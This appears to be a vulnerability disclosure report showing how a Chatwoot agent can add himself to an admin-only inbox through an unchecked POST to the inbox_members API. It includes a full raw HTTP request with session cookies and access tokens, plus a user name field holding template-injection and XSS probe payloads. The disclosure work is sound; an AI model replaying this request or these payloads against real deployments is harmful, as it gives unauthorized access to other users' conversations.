✍️ Description

Privilege escalation bug to add agent in a inbox

🕵️‍♂️ Proof of Concept

1. First goto https://app.chatwoot.com/app/accounts/4534/settings/agents/list from admin account and add a user B as agent .
2. now goto https://app.chatwoot.com/app/accounts/4534/settings/inboxes/list and add a inbox .In this inbox dont add user B as collaborator. Only allow admin himself . So, user B should not see this inbox conversation .
3. Finally goto user B account and sent bellow request to add user B himself in above inbox .

POST /api/v1/accounts/4534/inbox_members HTTP/1.1
Host: app.chatwoot.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://app.chatwoot.com/app/accounts/4534/settings/inboxes/3763
access-token: ke_z1cmdAmn5P3fXcA19oQ
token-type: Bearer
client: 8sEN_WgfdJXZSx7lZGQwOg
expiry: 1620971990
uid: wocali9440@tripaco.com
Content-Type: application/json;charset=utf-8
Content-Length: 42
Origin: https://app.chatwoot.com
Connection: close
Cookie: _chatwoot_session=hedXsukySFf5pA7%2FBjp75hyCNwU2NSjDrM%2B5EhKKefEq0MuBzh0EeNfTFv8UxtvvLes48feyTJSU7BZ6S5WZbcr3Ddf9Jr8MJfQB6uA25eAaXNdO1Pdhb55HriyrvzOJAmDUuGSG8WzTqkx4el5iInzpUv%2Bl7NCpaTfqUmy0rRlaobznQdhFetRj83R3L9%2BD%2FeeRDGs%2Bc8K%2BwOzwKkaVvR1KeqHhLrivxqZZO6GzZFtOjXo9XC4ZXUuodhRHGjORqrtRIwQ%2B%2BahgtcCpp3aj4QVpzp7ZJcVTz1nfPuHZWGKF1sSNfi2aFbLQ%2FZ95nD0s6XVe4yed6mfihMB%2BxzWshxooIWXrZGyMoa7Ienyo3CI3t1okIumIE52mjXlKEMfYijtexsdPO8E1n%2Bqjcg%3D%3D--HCFHDd9OKs3wLfIb--AKRIq9Q9HcyIcqFA1s4tIA%3D%3D; auth_data={%22access-token%22:%22ke_z1cmdAmn5P3fXcA19oQ%22%2C%22cache-control%22:%22max-age=0%2C%20private%2C%20must-revalidate%22%2C%22client%22:%228sEN_WgfdJXZSx7lZGQwOg%22%2C%22connection%22:%22keep-alive%22%2C%22content-type%22:%22application/json%3B%20charset=utf-8%22%2C%22date%22:%22Fri%2C%2030%20Apr%202021%2005:59:49%20GMT%22%2C%22etag%22:%22W/%5C%2225daadfaaf6c7a66e5c747536d457a2d%5C%22%22%2C%22expiry%22:%221620971990%22%2C%22referrer-policy%22:%22strict-origin-when-cross-origin%22%2C%22server%22:%22Cowboy%22%2C%22strict-transport-security%22:%22max-age=31536000%3B%20includeSubDomains%22%2C%22token-type%22:%22Bearer%22%2C%22transfer-encoding%22:%22chunked%22%2C%22uid%22:%22wocali9440@tripaco.com%22%2C%22via%22:%221.1%20vegur%22%2C%22x-content-type-options%22:%22nosniff%22%2C%22x-download-options%22:%22noopen%22%2C%22x-frame-options%22:%22SAMEORIGIN%22%2C%22x-permitted-cross-domain-policies%22:%22none%22%2C%22x-request-id%22:%224de2ec32-9fc1-4285-b508-4222b380d0ff%22%2C%22x-runtime%22:%220.318066%22%2C%22x-xss-protection%22:%221%3B%20mode=block%22}; user={%22access_token%22:%229k4ucCwpQEaV58sL6UV7EUPL%22%2C%22account_id%22:4534%2C%22availability_status%22:%22online%22%2C%22available_name%22:%22{{5*5}}%20user%20Bxss%5C%22'><img%20src=x%20onerror=alert(document.domain)>m%22%2C%22avatar_url%22:%22https://www.gravatar.com/avatar/601c09191d32c1ae061ac0140576c9e8?d=404%22%2C%22confirmed%22:true%2C%22display_name%22:%22%22%2C%22email%22:%22wocali9440@tripaco.com%22%2C%22id%22:5646%2C%22inviter_id%22:5634%2C%22name%22:%22{{5*5}}%20user%20Bxss%5C%22'><img%20src=x%20onerror=alert(document.domain)>m%22%2C%22provider%22:%22email%22%2C%22pubsub_token%22:%22yWadk4di2mAUXQwoH4YkrLA9%22%2C%22role%22:%22agent%22%2C%22ui_settings%22:{}%2C%22uid%22:%22wocali9440@tripaco.com%22%2C%22accounts%22:[{%22id%22:4534%2C%22name%22:%22nnxss%5C%22'><img%20src=x%20onerror=alert()>%22%2C%22active_at%22:null%2C%22role%22:%22agent%22}]}
Pragma: no-cache
Cache-Control: no-cache

{"inbox_id":"4222","user_ids":[5634,5636]}

here in this post request change inbox_id parameter value to your inbox id(This id also can be bruteforce) and user_ids parameter value to user B userid . Now user B will be added as collaborator in above inbox. So, using this bug user B can add himself to any inbox created by admin .

💥 Impact

Privilege escalation bug to add himself in inbox collaborator